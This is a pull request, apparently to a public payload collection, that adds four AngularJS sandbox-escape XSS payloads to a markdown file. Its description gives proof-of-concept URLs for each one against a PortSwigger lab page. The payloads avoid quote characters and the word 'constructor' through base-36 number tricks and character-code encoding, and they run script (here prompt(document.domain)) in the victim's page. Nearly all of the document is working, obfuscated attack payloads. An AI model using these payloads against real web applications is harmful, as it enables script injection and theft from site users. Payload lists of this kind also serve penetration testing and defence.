### PR TITLE
[update] Angular XSS payload

### DIFF
--- a/XSS Injection/XSS in Angular.md
+++ b/XSS Injection/XSS in Angular.md
@@ -157,6 +157,23 @@ AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter
 {{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
 ```
 
+AngularJS (without `'` single and `"` double quotes and `constructor` string)
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
 
 ### Blind XSS
 


### PR DESCRIPTION
Added payload which executes without any usage of (')single-quotes or (")double-quotes.

Proof of payload:

```
https://portswigger-labs.net/xss/angularjs.php?type=reflected&csp=0&version=1.6.0&x={{x=767015343;y=50986827;a=x.toString(36)%2by.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}

https://portswigger-labs.net/xss/angularjs.php?type=reflected&csp=0&version=1.6.0&x={{x=767015343;y=50986827;a=x.toString(36)%2by.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}

https://portswigger-labs.net/xss/angularjs.php?type=reflected&csp=0&version=1.6.0&x={{x=767015343;y=50986827;a=x.toString(36)%2by.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}

https://portswigger-labs.net/xss/angularjs.php?type=reflected&csp=0&version=1.6.0&x={{x=767015343;y=50986827;a=x.toString(36)%2by.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
```